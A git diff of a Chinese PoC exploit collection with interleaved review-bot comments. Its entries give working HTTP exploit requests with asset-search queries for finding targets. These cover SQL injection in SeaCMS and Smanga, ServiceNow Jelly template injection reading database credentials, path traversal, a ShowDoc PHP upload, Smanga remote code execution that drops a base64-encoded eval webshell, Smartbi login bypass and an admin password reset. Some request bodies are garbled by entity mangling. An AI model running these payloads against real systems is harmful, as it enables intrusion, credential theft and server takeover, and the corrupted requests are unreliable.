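Review bot: in SeaCMS海洋影视管理系统index.php存在SQL注入漏洞.md, `Content-Length: 56` does not match the body `cid=(select(1)from(select(sleep(6)))x)&text=1&color=1`, which is 53 bytes; a strict server waits for 3 more bytes and the time-based check then reads as a false positive. The `Accept-Ldwk: bG91ZG9uZ3dlbmt1` header is a non-standard marker carried over from the source tooling and should be removed. The fofa query is fenced ```yaml and the request ```java; neither fits. The title says `index.php`, but the vulnerable file is `/js/player/dmplayer/dmku/index.php`; name the full path in the title or 简介.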
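Review bot: Secnet安网-智能AC管理系统-actpt_5g-信息泄露.md duplicates Secnet安网智能AC管理系统actpt_5g信息泄露.md from the same commit (same endpoint `/actpt_5g.data`, same fofa query `title="安网-智能路由系统"`); keep one. The kept file should use the `#` title heading the other entries use rather than `##`, and `http://xxxxx/actpt_5g.data` should be written as a request or a path, consistent with the sibling files.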
@@ -0,0 +1,35 @@ +# Secnet安网 智能AC管理系统 actpt_5g 信息泄露 + +# 一、漏洞简介 +<font style="color:rgb(51, 51, 51);">Secnet安网 智能AC管理系统 actpt_5g 接口存在信息泄露漏洞,可获取用户密码信息。</font> + +# <font style="color:rgb(51, 51, 51);">二、影响版本</font> ++ <font style="color:rgb(51, 51, 51);">Secnet安网 智能AC管理系统 </font> + +# <font style="color:rgb(51, 51, 51);">三、资产测绘</font> ++ hunter`web.title="安网-智能路由系统"` ++ 特征 + +![1702369576891-35aff956-fbea-4f67-b05b-466200f5fcb3.png](./img/QmDYfQBL_bI9V4Jq/1702369576891-35aff956-fbea-4f67-b05b-466200f5fcb3-113410.png) + +# 四、漏洞复现 +```plain +GET /actpt_5g.data HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: ac_userid=admin,ac_passwd=70076EA6CDE654631A639018D9E23BC5 +Upgrade-Insecure-Requests: 1 +``` + +![1702369649483-f28655d2-e6c6-42f2-adf9-8c9b831c2cfe.png](./img/QmDYfQBL_bI9V4Jq/1702369649483-f28655d2-e6c6-42f2-adf9-8c9b831c2cfe-436141.png)使用泄露的账号密码`admin/admin`登录系统 + +![1702369681603-6e0bff32-6015-4fee-834e-c17072637574.png](./img/QmDYfQBL_bI9V4Jq/1702369681603-6e0bff32-6015-4fee-834e-c17072637574-749568.png) + + + +> 更新: 2024-02-29 23:57:12 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/gaq5fqcqle5ez69e> \ No newline at end of file diff --git a/ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md b/ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md new file mode 100644 index 0000000..4e66e3e --- /dev/null +++ b/ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md 
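Review bot: the request under 四、漏洞复现 sends `Cookie: ac_userid=admin,ac_passwd=70076EA6CDE654631A639018D9E23BC5` while the entry describes an information leak that yields those very credentials; if the cookie is required the issue is post-auth, and if it is not, remove it from the PoC so the pre-auth claim can be verified. The `<font style=...>` wrappers on the 简介 text and on the 二、三 headings are export residue. The image link and the sentence `使用泄露的账号密码...` run together on one line; separate them.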
@@ -0,0 +1,29 @@ +# ServiceNowUI Jelly模板注入漏洞(CVE-2024-4879) + +# 一、漏洞简介 +ServiceNow UI (用户界面)是ServiceNow平台提供的一种直观、现代化的用户交互方式。它采用响应式设计,能在各种设备上显示良好,并提供直观的导航菜单和面包屑功能,让用户能快速找到所需的功能和信息。同时,ServiceNow UI 支持个性化设置,用户可以自定义UI的外观和布局。针对移动设备,ServiceNow UI也进行了优化,提供了触摸优先的交互方式。总的来说, ServiceNow UI旨在为用户提供一种简单、统一且高效的使用体验,满足他们在ServiceNow平台上的各种需求。其存在CVE-2024-4879 Jelly模板注入漏洞攻击者可通过此漏洞执行代码,读取系统文件内容。 + +# 二、影响版本 +ServiceNowUI + +# 三、资产测绘 +```plain +icon_hash="1701804003" +``` + +![1720973227671-1bceec68-98aa-4ef0-9f45-36b23f5dc3ba.png](./img/eccG_4hJp1WG4yXc/1720973227671-1bceec68-98aa-4ef0-9f45-36b23f5dc3ba-174564.png) + +# 四、漏洞复现 +```plain +GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E%22 HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 +Connection: close +``` + +![1720973158902-350dace2-a8d1-4572-9aac-5d7b771fc939.png](./img/eccG_4hJp1WG4yXc/1720973158902-350dace2-a8d1-4572-9aac-5d7b771fc939-610384.png) + + + +> 更新: 2024-08-12 17:16:00 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/pz31klo12bw4m464> \ No newline at end of file diff --git a/ShokoServerwithpath存在任意文件读取漏洞.md b/ShokoServerwithpath存在任意文件读取漏洞.md new file mode 100644 index 0000000..ed2da4d --- /dev/null +++ b/ShokoServerwithpath存在任意文件读取漏洞.md 
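Review bot: 二、影响版本 in ServiceNowUIJelly模板注入漏洞(CVE-2024-4879).md says `ServiceNowUI`, which is a product, not a version; list the affected and patched releases. In the URL, `/co..nf/glide.db.properties` is unexplained: document whether the doubled dot is intentional, and the trailing `%22` after `%3C/style%3E` looks stray. `Host:` is empty. The 资产测绘 block gives `icon_hash="1701804003"` without saying which platform the query is for.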
@@ -0,0 +1,31 @@ +# ShokoServer withpath存在任意文件读取漏洞 + +# 一、漏洞简介 + Shoko Server 是一个基于 Java 的开源媒体服务器软件,旨在提供一个统一的媒体管理和流媒体解决方案。它支持多种媒体格式,包括视频、音频、图片等,能够对媒体文件进行索引、搜索、播放和流媒体等操作,ShokoServer 接口处存在任意文件读取漏洞,恶意攻击者可能利用该漏洞读取服务器上的敏感文件,例如客户记录、财务数据或源代码,导致数据泄露。 + +# 二、影响版本 +ShokoServer + +# 三、资产测绘 +```plain +title="Shoko WEB UI" +``` + +![1718818450198-44a101d0-316c-4d7e-8400-2a31b8d1f59e.png](./img/wxwNT0908SqtJqKO/1718818450198-44a101d0-316c-4d7e-8400-2a31b8d1f59e-667302.png) + +# 四、漏洞复现 +```java +GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1718818490807-dfbfe785-9fb9-4d6b-82ef-ba88038a9dcb.png](./img/wxwNT0908SqtJqKO/1718818490807-dfbfe785-9fb9-4d6b-82ef-ba88038a9dcb-188673.png) + + + + + +> 更新: 2024-06-23 23:42:48 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/xf0qp3zhll25buy9> \ No newline at end of file diff --git a/ShowDocPageController存在任意文件上传漏洞.md b/ShowDocPageController存在任意文件上传漏洞.md new file mode 100644 index 0000000..3f06c1a --- /dev/null +++ b/ShowDocPageController存在任意文件上传漏洞.md 
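Review bot: the request line `GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1` contains an unencoded `:` and backslashes; URL-encode the path or note that the target accepts it raw, since some clients rewrite it before sending. 二、影响版本 says only `ShokoServer`; add the affected and fixed versions. The request is fenced ```java.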
@@ -0,0 +1,43 @@ +# ShowDoc PageController存在任意文件上传漏洞 + +# 一、漏洞简介 +ShowDoc是一个非常适合IT团队的在线文档分享工具,它可以加快团队之间沟通的效率。通过showdoc,你可以方便地使用markdown语法来书写出美观的API文档、数据字典文档、技术文档、在线excel文档等等。ShowDoc系统存在任意文件上传漏洞,攻击者可以通过上传恶意文件执行任意命令,获取服务器管理权限。 + +# 二、影响版本 ++ ShowDoc + +# 三、资产测绘 ++ fofa`app="ShowDoc"` ++ 特征 + +![1717008909960-98ec294e-2aa1-4ed3-9e3e-77f5ccc28bb4.png](./img/8QZNWZkLqxGKi3s0/1717008909960-98ec294e-2aa1-4ed3-9e3e-77f5ccc28bb4-778686.png) + +# 四、漏洞复现 +```rust +POST /index.php?s=/home/page/uploadImg HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 +Content-Length: 241 +Content-Type: multipart/form-data; boundary=--------------------------921378126371623762173617 +Accept-Encoding: gzip + +----------------------------921378126371623762173617 +Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php" +Content-Type: text/plain + +<?php phpinfo();?> +----------------------------921378126371623762173617-- +``` + +![1717009091618-d86139f0-fa88-44ba-b1b9-816399d8a831.png](./img/8QZNWZkLqxGKi3s0/1717009091618-d86139f0-fa88-44ba-b1b9-816399d8a831-156809.png) + +```rust +http://127.0.0.1:8000/Public/Uploads/2024-05-30/66577ab51bb29.php +``` + +![1717009125691-f848e62e-6145-48a3-9008-d7129dd86854.png](./img/8QZNWZkLqxGKi3s0/1717009125691-f848e62e-6145-48a3-9008-d7129dd86854-508808.png) + + + +> 更新: 2024-06-01 11:14:22 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tw1q4kmr0efcmd8m> \ No newline at end of file diff --git a/Smangaget-file-flow存在任意文件读取漏洞.md b/Smangaget-file-flow存在任意文件读取漏洞.md new file mode 100644 index 0000000..2cc8a24 --- /dev/null +++ b/Smangaget-file-flow存在任意文件读取漏洞.md 
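Review bot: both code blocks in ShowDocPageController存在任意文件上传漏洞.md are fenced ```rust although one is a multipart HTTP request and the other a URL. The upload uses `filename="test.<>php"`, but nothing explains what filename handling the `<>` relies on; one sentence on that makes the correct fix obvious to a maintainer. The second block, `http://127.0.0.1:8000/Public/Uploads/2024-05-30/66577ab51bb29.php`, is the path from one run (date plus hash); label it as an example rather than a fixed location. 二、影响版本 lists only `ShowDoc`.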
@@ -0,0 +1,38 @@ +# Smanga get-file-flow存在任意文件读取漏洞 + +# 一、漏洞简介 +Smanga无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。Smanga get-file-flow存在任意文件读取漏洞。 + +# 二、影响版本 ++ Smanga + +# 三、资产测绘 ++ hunter`web.title=="smanga"` ++ 特征 + +![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/SNJ9xiUHBOpb3lvb/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-090368.png) + +# 四、漏洞复现 +```java +POST /php/get-file-flow.php HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 +Cookie: thinkphp_show_page_trace=0|0 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 39 + +file=../../../../../../../../etc/passwd +``` + +![1704897506388-882229d5-e4a4-452e-9b33-c85efb044957.png](./img/SNJ9xiUHBOpb3lvb/1704897506388-882229d5-e4a4-452e-9b33-c85efb044957-170447.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgkpb2mlbe6egiwy> \ No newline at end of file diff --git a/SmangamediaId存在SQL注入漏洞.md b/SmangamediaId存在SQL注入漏洞.md new file mode 100644 index 0000000..9e7e7f6 --- /dev/null +++ b/SmangamediaId存在SQL注入漏洞.md 
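Review bot: 二、影响版本 in Smangaget-file-flow存在任意文件读取漏洞.md is just `Smanga` with no version and no fixed release; add them or mark as unknown. `Host:` is empty and the request is fenced ```java. The `Cookie: thinkphp_show_page_trace=0|0` header looks incidental to the PoC; confirm whether it is required and drop it if not, so the minimal request is what gets documented.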
@@ -0,0 +1,59 @@ +# Smanga mediaId存在SQL注入漏洞 + +# 一、漏洞简介 +Smanga无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。Smanga mediaId存在SQL注入漏洞. + +# 二、影响版本 ++ Smanga + +# 三、资产测绘 ++ hunter`web.title=="smanga"` ++ 特征 + +![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/B-CxjmEk9QXAmBoF/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-400765.png) + +# 四、漏洞复现 +```java +POST /php/history/add.php HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 +Cookie: thinkphp_show_page_trace=0|0 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 196 + +chapterCover=1&chapterId=1' AND (SELECT 6064 FROM (SELECT(SLEEP(5)))bcUs) AND 'IwYx'='IwYx&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=1×tamp=12123123&userId=1 +``` + +![1704897270150-b9afaf47-d6ee-43ba-a9bb-6acd85c5a8f7.png](./img/B-CxjmEk9QXAmBoF/1704897270150-b9afaf47-d6ee-43ba-a9bb-6acd85c5a8f7-394159.png) + +sqlmap + +```java +POST /php/history/add.php HTTP/1.1 +Host: +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 +Cookie: thinkphp_show_page_trace=0|0 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 196 + 
+chapterCover=1&chapterId=1&chapterName=1&chatpterPath=1&chaptertype=image&keyword=1&mangaCover=undefined&mangaId=1&mangaName=&mediaId=1×tamp=12123123&userId=1 +``` + +![1704897297677-8ec32e97-be60-4261-aacb-709fb1457a99.png](./img/B-CxjmEk9QXAmBoF/1704897297677-8ec32e97-be60-4261-aacb-709fb1457a99-346321.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ip5new4ve7mtypcf> \ No newline at end of file diff --git a/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md b/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md new file mode 100644 index 0000000..6063d30 --- /dev/null +++ b/Smanga未授权远程代码执行漏洞(CVE-2023-36076).md 
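Review bot: in both request bodies `&mediaId=1×tamp=12123123` is an HTML-entity mangling of `&timestamp=` (`&times` rendered as `×`), so the `timestamp` field is lost as committed. The title says `mediaId`, but the payload is placed in `chapterId` (`chapterId=1' AND (SELECT 6064 FROM (SELECT(SLEEP(5)))bcUs) AND 'IwYx'='IwYx`); name the parameter that is actually injectable so the fix targets the right query. `Content-Length: 196` is reused for two bodies of different length; set each to the real value.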
@@ -0,0 +1,74 @@ +# Smanga未授权远程代码执行漏洞(CVE-2023-36076) + +# 一、漏洞简介 +Smanga无需配置,docker直装的漫画流媒体阅读工具。以emby plex为灵感,为解决漫画阅读需求而开发的漫画阅读器。在/php/manga/delete.php接口处存在未授权远程代码执行漏洞,攻击者可在目标主机执行任意命令,获取服务器权限。 + +# 二、影响版本 ++ Smanga + +# 三、资产测绘 ++ hunter`web.title=="smanga"` ++ 特征 + +![1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0.png](./img/6zH2rDbEXutDEKrx/1704896644693-d87321ff-18ab-47ce-a047-0b7cbeb372e0-384375.png) + +# 四、漏洞复现 +```java +POST /php/manga/delete.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 +If-None-Match: "63ff3602-c6d" +If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 360 + +mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo `whoami` > 1.txt;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true +``` + +![1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59.png](./img/6zH2rDbEXutDEKrx/1704896774471-f0fafe1c-b1a8-4039-b32b-dcc54e0e2d59-384132.png) + +获取命令执行结果 + +```java +GET /php/manga/1.txt HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 +Content-Length: 0 +``` + +![1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce.png](./img/6zH2rDbEXutDEKrx/1704896808454-1fdfd6bb-66bc-4487-8f91-e6b908e9efce-693600.png) + +写入webshell + +```java +POST /php/manga/delete.php HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 +Accept: 
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9,ak;q=0.8 +If-None-Match: "63ff3602-c6d" +If-Modified-Since: Wed, 01 Mar 2023 11:24:50 GMT +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 360 + +mangaId=1 union select * from (select 1)a join (select 2)b join (select 3)c join (select 4)d join (select '\";echo PD9waHAgY2xhc3MgR3c2UVBoNjYgeyBwdWJsaWMgZnVuY3Rpb24gX19jb25zdHJ1Y3QoJEg4OTBhKXsgQGV2YWwoIi8qWjlZczlnSVY3MyovIi4kSDg5MGEuIi8qWjlZczlnSVY3MyovIik7IH19bmV3IEd3NlFQaDY2KCRfUkVRVUVTVFsneCddKTs/Pg== | base64 -d > 1.php;\"')e join (select 6)f join (select 7)g join (select 8)h join (select 9)i join (select 10)j join (select 11)k join (select 12)l;&deleteFile=true +``` + +webshell地址 + +```java +/php/manga/1.php +``` + +![1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77.png](./img/6zH2rDbEXutDEKrx/1704896888984-0b313d0c-dfd8-48a8-98e3-00edde806d77-383079.png) + + + +> 更新: 2024-02-29 23:55:42 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fgwxzim62xadgc33> \ No newline at end of file diff --git a/Smart-S85F-任意文件读取.md b/Smart-S85F-任意文件读取.md new file mode 100644 index 0000000..674cfc6 --- /dev/null +++ b/Smart-S85F-任意文件读取.md @@ -0,0 +1,17 @@ +## Smart S85F 任意文件读取 +``` +GET /log/decodmail.php?file=L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA== HTTP/1.1 +Host: x.x.x.x +Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/114.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` 
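Review bot: the first and third requests in Smanga未授权远程代码执行漏洞(CVE-2023-36076).md both declare `Content-Length: 360` although the webshell body is far longer than the `whoami` body, so the third request is truncated as written. Committing a base64-encoded webshell (`echo PD9waHAg... | base64 -d > 1.php`) is a problem on its own: it trips scanners on every clone and the proof does not need it; the `echo \`whoami\` > 1.txt` step already demonstrates execution. Both steps write files into `/php/manga/` on the target; say so, since that is the indicator a responder would look for. The `Accept:` header of the third request is split across lines by the export.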
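Review bot: Smart-S85F-任意文件读取.md has no 简介, fofa or 影响版本 section, only a request. The title says 任意文件读取, but the base64 value `L2V0Yy9gc2xlZXAke0lGU30xMGAucGNhcA==` decodes to `/etc/\`sleep${IFS}10\`.pcap`, a time-based command-injection probe, so either the classification or the evidence is wrong. The request carries `Cookie: PHPSESSID=c36d5527fd784aa29748b3b1c50be7bc`; state whether a session is required.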
diff --git a/Smartbi 内置用户登陆绕过.md b/Smartbi 内置用户登陆绕过.md index 92796cb..bf1b49f 100644 --- a/Smartbi 内置用户登陆绕过.md +++ b/Smartbi 内置用户登陆绕过.md @@ -2,7 +2,7 @@ ## fofa ``` -app="SMARTBI" +body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')" ``` ## poc @@ -21,7 +21,6 @@ Content-Type: application/x-www-form-urlencoded Content-Length: 68 className=UserService&methodName=loginFromDB¶ms=["service","0a"] - ``` ![image](https://github.com/wy876/POC/assets/139549762/419e82b7-4236-416d-91ef-74caf533e8ae) diff --git a/Smartbi-内置用户登陆绕过.md b/Smartbi-内置用户登陆绕过.md new file mode 100644 index 0000000..92796cb --- /dev/null +++ b/Smartbi-内置用户登陆绕过.md @@ -0,0 +1,31 @@ +## Smartbi 内置用户登陆绕过 + +## fofa +``` +app="SMARTBI" +``` + +## poc +``` +POST /smartbi/vision/RMIServlet HTTP/1.1 +Host: 172.16.170.231:18080 +Pragma: no-cache +Cache-Control: no-cache +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 68 + +className=UserService&methodName=loginFromDB¶ms=["service","0a"] + +``` + +![image](https://github.com/wy876/POC/assets/139549762/419e82b7-4236-416d-91ef-74caf533e8ae) + + +## 漏洞分析 +- https://exp.ci/2023/06/17/Smartbi-%E5%86%85%E7%BD%AE%E7%94%A8%E6%88%B7%E7%99%BB%E9%99%86%E7%BB%95%E8%BF%87%E5%88%86%E6%9E%90/ diff --git a/Smartbi修改用户密码漏洞.md b/Smartbi修改用户密码漏洞.md new file mode 100644 index 0000000..2aef3e7 --- /dev/null +++ b/Smartbi修改用户密码漏洞.md 
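Review bot: replacing `app="SMARTBI"` with the body fingerprint `gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')` is fine, but the same commit adds Smartbi-内置用户登陆绕过.md from blob `92796cb`, the pre-change version of this file, so the old query lives on in a duplicate; apply the same change there or drop that file.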
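Review bot: the context line `className=UserService&methodName=loginFromDB¶ms=["service","0a"]` shows `¶ms` where `&params` belongs (`&para` decoded as `¶`), so the committed body has no `params` field; `Content-Length: 68` only adds up for `&params=`. Fix the body while touching this hunk rather than only removing the trailing blank line.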
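Review bot: Smartbi-内置用户登陆绕过.md is added with index `92796cb`, the blob `Smartbi 内置用户登陆绕过.md` had before this commit, so this is the old file copied under a hyphenated name with the stale `app="SMARTBI"` query and the same `¶ms` corruption in the body. If the intent is a rename, rename and remove the old path; otherwise drop this file. The hardcoded `Host: 172.16.170.231:18080` should be a placeholder like the other entries.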
@@ -0,0 +1,24 @@ +# Smartbi修改用户密码漏洞 + +Smartbi修改用户密码漏洞 + +## fofa + +```javascript +body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')" +``` + +## poc + +```javascript +POST /smartbi/vision/RMIServlet HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 + +className=UserService&methodName=changePasswordEx¶ms=["admin","","1"] +``` + +![9b32574b377d64a607e4dcacea7ebf7e](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251446830.png) + +![63b435599730ed2ea73434ef51b23a30](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410251447017.png) \ No newline at end of file diff --git a/Smartbi内置用户登陆绕过漏洞.md b/Smartbi内置用户登陆绕过漏洞.md new file mode 100644 index 0000000..995a6d5 --- /dev/null +++ b/Smartbi内置用户登陆绕过漏洞.md 
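Review bot: `className=UserService&methodName=changePasswordEx¶ms=["admin","","1"]` has the same `¶ms` mangling of `&params`. More important, this request changes the admin account's password; the entry should say so plainly and mark it as state-changing, not something to include in a blind scan. The line under the title merely repeats the title; give affected versions and a fix reference, as the other Smartbi entries do. Both blocks are fenced ```javascript.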
@@ -0,0 +1,59 @@ +# Smartbi内置用户登陆绕过漏洞 + +# 一、漏洞简介 +Smartbi大数据分析产品融合BI定义的所有阶段,对接各种业务数据库、数据仓库和大数据分析平台,进行加工处理、分析挖掘和可视化展现;满足所有用户的各种数据分析应用需求,如大数据分析、可视化分析、探索式分析、复杂报表、应用分享等Smartbi在安装时会内置几个用户,在使用特定接口时,可绕过用户身份认证机制获取其身份凭证,随后可使用获取的身份凭证调用后台接口,可能导致敏感信息泄露和代码执行。 + +# 二、影响版本 ++ V7 <= Smartbi <= V10 + +# 三、资产测绘 + + ++ hunter:`app.name=="SMARTBI 思迈特"` + +![1692015464478-003bd803-eb83-4cf4-a640-dadf6bb7867c.png](./img/lnCsT28Xnl-0EUXv/1692015464478-003bd803-eb83-4cf4-a640-dadf6bb7867c-424799.png) + ++ 登录页面 + +![1692015491752-22149cdc-3ef4-4506-a96d-72460562ef79.png](./img/lnCsT28Xnl-0EUXv/1692015491752-22149cdc-3ef4-4506-a96d-72460562ef79-181146.png) + +# 四、漏洞复现 +1. 访问POC出现如下情况则可能存在漏洞 + +```plain +/smartbi/vision/RMIServlet +``` + +![1692016139611-568c3342-2a55-46ff-92d8-f1ddc6579731.png](./img/lnCsT28Xnl-0EUXv/1692016139611-568c3342-2a55-46ff-92d8-f1ddc6579731-883447.png)2. 使用POST请求如下params:其中的第一个参数是内置的三个用户名(public、service、system)可随机构造绕过登录,第二个参数是三个账号默认的密文密码(默认值为0a),当响应如下,且`result`参数为`true`时表示存在漏洞。 + +```plain +POST /smartbi/vision/RMIServlet HTTP/1.1 +Host: xx.xx.xx.xx +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: identity +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Content-Type: application/x-www-form-urlencoded +Cookie: JSESSIONID=B08E6669BFA8E9D85FB6BD98411C349C +Origin: https://smartbi.cy-sys.cn +Referer: https://smartbi.cy-sys.cn/smartbi/vision/RMIServlet +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Content-Length: 81 + +className=UserService&methodName=loginFromDB¶ms=["system","0a"] +``` + +![1692022082661-3bf7889b-3fb3-4ef3-a1e1-628a7177aa0e.png](./img/lnCsT28Xnl-0EUXv/1692022082661-3bf7889b-3fb3-4ef3-a1e1-628a7177aa0e-823591.png) + +3. 
访问`https://xx.xx.xx.xx/smartbi/vision/index.jsp`成功进入后台 + +![1692022285213-e9394429-fba8-4237-8c14-0ec583bf0151.png](./img/lnCsT28Xnl-0EUXv/1692022285213-e9394429-fba8-4237-8c14-0ec583bf0151-880868.png) + + + +> 更新: 2024-02-29 23:55:51 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/fkhbh9sf2269nv0m> \ No newline at end of file diff --git a/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md b/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md new file mode 100644 index 0000000..00323ee --- /dev/null +++ b/SolarWindsServ-U存在目录遍历漏洞(CVE-2024-28995).md 
